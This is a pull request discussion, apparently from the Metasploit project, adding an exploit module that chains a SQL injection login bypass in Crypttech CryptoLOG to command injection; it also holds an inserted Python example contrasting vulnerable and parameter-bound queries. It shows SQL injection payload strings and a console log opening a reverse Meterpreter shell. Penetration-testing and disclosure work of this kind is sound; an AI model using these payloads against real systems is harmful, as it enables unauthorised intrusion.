
Add module Crypttech CryptoLog Remote Code Execution #8331

Merged
merged 6 commits into from May 5, 2017

Conversation

@mmetince
Contributor

commented May 2, 2017

This module exploits the SQL injection and command injection vulnerabilities of CryptoLog. An unauthenticated user can execute a terminal command under the context of the web user.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploits/linux/http/cryptolog_exec.rb
  • set RHOST <YOUR_TARGET>
  • python/meterpreter/reverse_tcp is configured as the default payload. Change it if you need to. In most cases, you're okay going with the default payload type.
  • set LHOST <LOCAL IP>
  • exploit and then verify the following output.
msf exploit(cryptolog) > exploit 

[*] Started reverse TCP handler on 12.0.0.3:4444 
[*] Bypassing login by exploiting SQLi flaw
[+] Successfully logged in
[*] Exploiting command injection flaw
[*] Sending stage (39832 bytes) to 12.0.0.45
[*] Meterpreter session 3 opened (12.0.0.3:4444 -> 12.0.0.45:51991) at 2017-05-02 18:04:52 -0400

meterpreter > getuid
Server username: www-data
meterpreter > pwd
/var/www/cryptolog
meterpreter >

It's not possible to download a free trial of this product. Where can I send the pcap file that I recorded during exploitation?

@busterb
Member

commented May 2, 2017

Send pcaps to msfdev@metasploit.com

@mmetince
Contributor Author

commented May 2, 2017

Thanks @busterb let me know if you haven't received the e-mail.

@busterb
Member

commented May 3, 2017

got it, thanks!

login.php endpoint is responsible for login process. One of the user supplied parameter is used by the application without input validation
and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session.
logshares_ajax.php endpoint is repsonsible for executing a operation system command. It's not possible to access this endpoint without having

@jvoisin

jvoisin May 3, 2017

Contributor

*reponsible

'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,

@jvoisin

jvoisin May 3, 2017

Contributor

Why ARCH_PYTHON instead of ARCH_CMD?

@mmetince

mmetince May 3, 2017

Author Contributor

Because, I ❤️ meterpreter. I always try to convert ARCH_CMD to ARCH_PYTHON or other type of payload that gives a meterpreter shell instead of traditional one.

@jvoisin

jvoisin May 3, 2017

Contributor

Sure, but what if my target doesn't come with Python?
You can always use the magical "shell2meterpreter" module once you've got a shell ;)

@mmetince

mmetince May 3, 2017

Author Contributor

I forgot to mention that this product is shipped as a Linux ISO. :)

'act' => 'login'
},
'vars_post' => {
'user' => "#{r}' OR #{i}=#{i}-- #{r}",

@jvoisin

jvoisin May 3, 2017

Contributor

There is no need to pre and post-fix with #{r} here, isn't it?

@mmetince

mmetince May 3, 2017

Author Contributor

Thanks for the review @jvoisin. You're right. I've converted it to the shorter form.
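The login bypass that the module description above attributes to login.php (a request parameter used in the query without validation or parameter binding) and the `' OR i=i` payload discussed in this thread, shown side by side with the fix, as an added example that is not part of the module, the framework, or the vendor's code. It uses Python's standard sqlite3 as an offline stand-in for the application's database and a constructed one-row users table; the table name, column names and stored credentials are assumptions. The module's final payload ends in `#`, which is MySQL line-comment syntax; SQLite only honours `--`, so the constructed input below follows the earlier `-- ` form from this thread. The first handler splices the input into the SQL text, the second binds it as a parameter; the same input that logs the first one in as the stored account matches nothing in the second.

```python
import sqlite3


def build_db():
    """Constructed sample database standing in for the application's own (schema assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT NOT NULL, pass TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def login_concatenated(conn, user, password):
    """Vulnerable pattern: request parameters are spliced into the SQL text.

    Whatever the caller puts in `user` is parsed as SQL, so a quote closes the
    string literal and the rest of the input becomes part of the WHERE clause.
    Returns the matched account name, or None when no row matches.
    """
    sql = ("SELECT user FROM users WHERE user = '" + user
           + "' AND pass = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_bound(conn, user, password):
    """Hardened pattern: parameter binding.

    The SQL text is fixed; the driver hands `user` and `password` to the engine
    as values, so quotes and comment markers are only characters inside the
    compared string and can never change the statement's structure.
    """
    row = conn.execute(
        "SELECT user FROM users WHERE user = ? AND pass = ?",
        (user, password),
    ).fetchone()
    return row[0] if row else None


# Constructed input in the shape of the thread's earlier payload ("<r>' OR <i>=<i>-- <r>")
# with fixed filler values; hypothetical names, not identifiers from the module.
BYPASS_USER = "zz' OR 7=7-- zz"
BYPASS_PASS = "zz"


def compare_handlers():
    """Run the same credential pairs through both handlers and report what each returns."""
    conn = build_db()
    return {
        "valid_concat": login_concatenated(conn, "admin", "correct-horse-battery"),
        "valid_bound": login_bound(conn, "admin", "correct-horse-battery"),
        "bypass_concat": login_concatenated(conn, BYPASS_USER, BYPASS_PASS),
        "bypass_bound": login_bound(conn, BYPASS_USER, BYPASS_PASS),
        "wrong_concat": login_concatenated(conn, "admin", "nope"),
        "wrong_bound": login_bound(conn, "admin", "nope"),
    }


if __name__ == "__main__":
    for name, result in compare_handlers().items():
        print(f"{name:>14}: {result!r}")
```

Only `bypass_concat` comes back with an account name for the bypass input; the bound handler treats the whole string as a username that does not exist. The same binding discipline is what removes the SQL injection step on which the command injection in logshares_ajax.php depends, since that endpoint is only reachable with a valid session.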

@jmartin-r7
Contributor

commented May 3, 2017

Since there are multiple software products named “CryptoLog”, it would be useful to rename the module to be more specific on the vendor as well as the attack vector. Something like "crypttech_cryptolog_login_exec" would help users know what this applies to at a glance.

@mmetince
Contributor Author

commented May 3, 2017

Totally agreed @jmartin-r7. Shall I change the title of the module to something like "Crypttech CryptoLOG Remote Code Execution" or leave it as is?

@jmartin-r7
Contributor

commented May 3, 2017

Please expand the title as well. It may also be possible to create a CVE reference for this if you have not already gone that route.

We can assist with reporting to MITRE and potential CVE assignment, if you need to send more details they can go to security@rapid7.com. Public key is here: https://www.rapid7.com/disclosure/ if you would like to send anything securely.

@todb-r7
Contributor

commented May 3, 2017

+1 to @jmartin-r7 -- @mmetince, if you could provide a contact at the vendor that you already talked to so we can make sure they're on that same page, if they have an issue number to track this, that'd be swell.

We can deal with the vendor, CERT/CC, MITRE, and all the other foo around disclosure so you can keep on hackin'. :) Since all the details are public now, I don't see a ton of upside to PGP, but it's there if you'd like it.

@jmartin-r7 jmartin-r7 self-assigned this May 3, 2017

@mmetince
Contributor Author

commented May 4, 2017

Thanks everyone for helping! I've sent the details to security@rapid7.com. Let me know if I should make additional changes on this PR.

@jmartin-r7
Contributor

left a comment

Let me know if you decide to consolidate on the method call for the request, will land once you decide.

'user' => "' OR #{i}=#{i}#",
'pass' => "#{r}"
}
})

@jmartin-r7

jmartin-r7 May 5, 2017

Contributor

Looks like you could consolidate lines 56-69 and 81-94 into a local method, may need to take a parameter for the user value. Not required but would be appreciated to reduce code.

@mmetince

mmetince May 5, 2017

Author Contributor

Agreed. I've made the necessary changes and tested again ;) all good.

mmetince added 2 commits May 5, 2017

@jmartin-r7 jmartin-r7 merged commit 720a02f into rapid7:master May 5, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
jmartin-r7 added a commit that referenced this pull request May 5, 2017
@jmartin-r7
Contributor

commented May 5, 2017

Release Notes

The exploits/linux/http/crypttech_cryptolog_login_exec exploit has been added to the framework. The module exploits an SQL injection vulnerability to perform command injection on Crypttech CryptoLOG. An unauthenticated user can execute any terminal command under the context of the web user.

@mmetince mmetince deleted the mmetince:cryptolog_exec branch May 6, 2017

@todb-r7 todb-r7 changed the title Adding module CryptoLog Remote Code Execution Add module Crypttech CryptoLog Remote Code Execution May 8, 2017

@todb-r7 todb-r7 referenced this pull request Jun 15, 2017